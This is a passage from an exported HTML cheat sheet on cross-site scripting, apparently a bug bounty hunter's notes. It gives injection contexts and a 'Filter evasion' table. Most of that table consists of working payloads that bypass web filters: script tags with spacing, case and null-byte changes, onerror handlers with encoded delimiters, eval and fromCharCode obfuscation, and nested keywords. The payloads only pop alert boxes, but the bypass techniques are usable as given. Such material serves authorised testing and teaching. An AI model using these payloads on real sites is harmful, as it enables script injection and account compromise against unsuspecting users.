C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>HTML Tag context</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>HTML Tag attribute context</th></tr></thead><tbody><tr id="e36ffb9f-04e8-440f-8f5b-47b7e69f5478"><td class="cell-JcWP">Attack vector</td><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709/&#x27;%20%60%20e36ffb9f04e8440f8f5b47b7e69f5478.html">&#x27;&quot;`</a></td><td class="cell-hH;N">&lt;u&gt;Rat was here + &lt;img src=x&gt;</td><td class="cell-VZ^b">&quot;&#x27;`&gt;</td></tr><tr id="c6e6ca69-b531-4fce-978c-5b2180a6485d"><td class="cell-JcWP">Breaks</td><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709/Breaks%20javascript%20functions%20c6e6ca69b5314fce978c5b2180a6485d.html">Breaks javascript functions</a></td><td class="cell-hH;N">Nothing, reflects value into HTML context without sanitise, allowing for own tags</td><td class="cell-VZ^b">HTML tag attribute such as &quot;Value&quot; for &lt;input&gt; tag</td></tr><tr id="8a13b68f-c901-4164-b4b0-f4d929bc58fa"><td class="cell-JcWP">Exploit</td><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709/Try%20to%20insert%20our%20own%20JS%20code%208a13b68fc9014164b4b0f4d929bc58fa.html">Try to insert our own JS code</a></td><td class="cell-hH;N">Add event handlers to tags</td><td class="cell-VZ^b">Insert JS event handler or JS code into tag</td></tr><tr id="912c1458-4615-4ad2-a89c-539bd65f48ff"><td class="cell-JcWP">Example </td><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709/&#x27;);%20alert();%20%E2%80%94%20912c145846154ad2a89c539bd65f48ff.html">&#x27;); alert(); —</a></td><td class="cell-hH;N">&lt;img src=x onerror=alert()&gt;</td><td class="cell-VZ^b">&#x27; alert(); &#x27;</td></tr></tbody></table></div><h1 id="9cdac75d-170c-49cf-9a65-b7042c3f6905" class="">Filter evasion</h1><div id="c0f9870e-0132-4ea5-b82e-30269cc90503" class="collection-content"><h4 class="collection-title">Techniques</h4><table class="collection-content"><thead><tr><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesTitle"><path d="M7.73943662,8.6971831 C7.77640845,8.7834507 7.81338028,8.8943662 7.81338028,9.00528169 C7.81338028,9.49823944 7.40669014,9.89260563 6.91373239,9.89260563 C6.53169014,9.89260563 6.19894366,9.64612676 6.08802817,9.30105634 L5.75528169,8.33978873 L2.05809859,8.33978873 L1.72535211,9.30105634 C1.61443662,9.64612676 1.2693662,9.89260563 0.887323944,9.89260563 C0.394366197,9.89260563 0,9.49823944 0,9.00528169 C0,8.8943662 0.0246478873,8.7834507 0.0616197183,8.6971831 L2.46478873,2.48591549 C2.68661972,1.90669014 3.24119718,1.5 3.90669014,1.5 C4.55985915,1.5 5.12676056,1.90669014 5.34859155,2.48591549 L7.73943662,8.6971831 Z M2.60035211,6.82394366 L5.21302817,6.82394366 L3.90669014,3.10211268 L2.60035211,6.82394366 Z M11.3996479,3.70598592 C12.7552817,3.70598592 14,4.24823944 14,5.96126761 L14,9.07922535 C14,9.52288732 13.6549296,9.89260563 13.2112676,9.89260563 C12.8169014,9.89260563 12.471831,9.59683099 12.4225352,9.19014085 C12.028169,9.6584507 11.3257042,9.95422535 10.5492958,9.95422535 C9.60035211,9.95422535 8.47887324,9.31338028 8.47887324,7.98239437 C8.47887324,6.58978873 9.60035211,6.08450704 10.5492958,6.08450704 C11.3380282,6.08450704 12.040493,6.33098592 12.4348592,6.81161972 L12.4348592,5.98591549 C12.4348592,5.38204225 11.9172535,4.98767606 11.1285211,4.98767606 C10.6602113,4.98767606 10.2411972,5.11091549 9.80985915,5.38204225 C9.72359155,5.43133803 9.61267606,5.46830986 9.50176056,5.46830986 C9.18133803,5.46830986 8.91021127,5.1971831 8.91021127,4.86443662 C8.91021127,4.64260563 9.0334507,4.44542254 9.19366197,4.34683099 C9.87147887,3.90316901 10.6232394,3.70598592 11.3996479,3.70598592 Z M11.1778169,8.8943662 C11.6830986,8.8943662 12.1760563,8.72183099 12.4348592,8.37676056 L12.4348592,7.63732394 C12.1760563,7.29225352 11.6830986,7.11971831 11.1778169,7.11971831 C10.5616197,7.11971831 10.056338,7.45246479 10.056338,8.0193662 C10.056338,8.57394366 10.5616197,8.8943662 11.1778169,8.8943662 Z M0.65625,11.125 L13.34375,11.125 C13.7061869,11.125 14,11.4188131 14,11.78125 C14,12.1436869 13.7061869,12.4375 13.34375,12.4375 L0.65625,12.4375 C0.293813133,12.4375 4.43857149e-17,12.1436869 0,11.78125 C-4.43857149e-17,11.4188131 0.293813133,11.125 0.65625,11.125 Z"></path></svg></span>Name</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>Tags</th><th><span class="icon property-icon"><svg viewBox="0 0 14 14" style="width:14px;height:14px;display:block;fill:rgba(55, 53, 47, 0.4);flex-shrink:0;-webkit-backface-visibility:hidden" class="typesText"><path d="M7,4.56818 C7,4.29204 6.77614,4.06818 6.5,4.06818 L0.5,4.06818 C0.223858,4.06818 0,4.29204 0,4.56818 L0,5.61364 C0,5.88978 0.223858,6.11364 0.5,6.11364 L6.5,6.11364 C6.77614,6.11364 7,5.88978 7,5.61364 L7,4.56818 Z M0.5,1 C0.223858,1 0,1.223858 0,1.5 L0,2.54545 C0,2.8216 0.223858,3.04545 0.5,3.04545 L12.5,3.04545 C12.7761,3.04545 13,2.8216 13,2.54545 L13,1.5 C13,1.223858 12.7761,1 12.5,1 L0.5,1 Z M0,8.68182 C0,8.95796 0.223858,9.18182 0.5,9.18182 L11.5,9.18182 C11.7761,9.18182 12,8.95796 12,8.68182 L12,7.63636 C12,7.36022 11.7761,7.13636 11.5,7.13636 L0.5,7.13636 C0.223858,7.13636 0,7.36022 0,7.63636 L0,8.68182 Z M0,11.75 C0,12.0261 0.223858,12.25 0.5,12.25 L9.5,12.25 C9.77614,12.25 10,12.0261 10,11.75 L10,10.70455 C10,10.4284 9.77614,10.20455 9.5,10.20455 L0.5,10.20455 C0.223858,10.20455 0,10.4284 0,10.70455 L0,11.75 Z"></path></svg></span>Column</th></tr></thead><tbody><tr id="a4f80788-ef62-415e-a79e-902e21da0760"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Basic%20modifications%20a4f80788ef62415ea79e902e21da0760.html">Basic modifications</a></td><td class="cell-]b`w">&lt;script&gt;alert(1)&lt;/script&gt;
&lt;script &gt;alert(1)&lt;/script&gt;
&lt;script &gt;alert(1)&lt;/script&gt;
Encoded tabs/newlines/CR
&lt;script&amp;#9&gt;alert(1)&lt;/script&gt;
&lt;script&amp;#10&gt;alert(1)&lt;/script&gt;
&lt;script&amp;#13&gt;alert(1)&lt;/script&gt;
Capital letters
&lt;ScRipT&gt;alert(1)&lt;/sCriPt&gt;Adding nullbytes:
&lt;%00script&gt;alert(1)&lt;/script&gt;
&lt;script&gt;al%00ert(1)&lt;/script&gt;</td><td class="cell-e]Gw">Doing basic things like adding spaces, encoding tabs, newlines and carriege rerurns can do a lot alread</td></tr><tr id="22b6bf65-e8d1-4dd1-a983-ce484fe28460"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Attributes%20and%20tags%2022b6bf65e8d14dd1a983ce484fe28460.html">Attributes and tags</a></td><td class="cell-]b`w">&lt;input type=&quot;text&quot; name=&quot;input&quot; value=&quot;hello&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;randomtag type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input/type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input&amp;#9type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input&amp;#10type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input&amp;#13type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input/&#x27;type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;iNpUt type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;%00input type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;inp%00ut type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input t%00ype=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;input type=&quot;text&quot; name=&quot;input&quot; value=&quot;&gt;&lt;script&gt;a%00lert(1)&lt;/script&gt;</td><td class="cell-e]Gw">We can do the same basic modifications to attribute tags and add things like nullbytes</td></tr><tr id="951706cd-73b2-430b-a667-ec0e3cf631fc"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Event%20handlers%20951706cd73b2430ba667ec0e3cf631fc.html">Event handlers</a></td><td class="cell-]b`w">Use burp intruder, select your event handler that&#x27;s blocked and use burp suites cheat sheet to test all event handlers</td><td class="cell-e]Gw">Try all different event handlers
<a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a>
Use burp intruder</td></tr><tr id="bbc14efa-30bd-4279-8308-d674029f85a1"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Delimiters%20and%20brackers%20bbc14efa30bd42798308d674029f85a1.html">Delimiters and brackers</a></td><td class="cell-]b`w">&lt;img onerror=&quot;alert(1)&quot;src=x&gt;
&lt;img onerror=&#x27;alert(1)&#x27;src=x&gt;
URL encodign
&lt;img onerror=&amp;#34alert(1)&amp;#34src=x&gt;
&lt;img onerror=&amp;#39alert(1)&amp;#39src=x&gt;
Backticks
&lt;img onerror=<code>alert(1)</code>src=x&gt;
Encoded backtics
&lt;img onerror=&amp;#96alert(1)&amp;#96src=x&gt;</td><td class="cell-e]Gw">Sometimes we can play with things like delimiters by encoding them if they are blocked</td></tr><tr id="4a92e5bf-6a90-4319-9909-0ce0c9a35da3"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Delimiters%20and%20brackers%20-%202%204a92e5bf6a90431999090ce0c9a35da3.html">Delimiters and brackers - 2 </a></td><td class="cell-]b`w">Double use of delimiters
&lt;&lt;script&gt;alert(1)//&lt;&lt;/script&gt;
Unknown delimiters
«input onsubmit=alert(1)»
Encoded
&amp;#174input onsubmit=alert(1)&amp;#175</td><td class="cell-e]Gw"></td></tr><tr id="6ea0bd97-25f8-41a5-9ecc-7da81ef27096"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Eval()%206ea0bd9725f841a59ecc7da81ef27096.html">Eval()</a></td><td class="cell-]b`w">&lt;script&gt;eval(&#x27;a\u006cert(1)&#x27;)&lt;/script&gt;
&lt;script&gt;eval(&#x27;al&#x27; + &#x27;ert(1)&#x27;)&lt;/script&gt;
&lt;script&gt;eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))&lt;/script&gt;</td><td class="cell-e]Gw">We can also make use of the eval() function in JS to obfuscate some strings so they won&#x27;t be filtered</td></tr><tr id="8aa56d79-8b6b-422e-986f-2b2f630adab5"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Using%20filtered%20words%20in%20filtered%20words%208aa56d798b6b422e986f2b2f630adab5.html">Using filtered words in filtered words</a></td><td class="cell-]b`w">If script is filtered
&lt;scrscriptipt&gt; might become &lt;script&gt;</td><td class="cell-e]Gw">This helped me find many bounties 😂</td></tr><tr id="6af36205-7ffa-4815-8bc3-0b14979e51ad"><td class="cell-title"><a href="XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503/Use%20your%20imagination%203%206af362057ffa48158bc30b14979e51ad.html">Use your imagination &lt;3</a></td><td class="cell-]b`w"></td><td class="cell-e]Gw"></td></tr></tbody></table></div><p id="2eecc28e-838e-4e52-8465-8b554a2d16fe" class="">
</p></div></article><a href="https://hide01.ir"><span class="icon">🎩</span>Hide01</a></body></html>
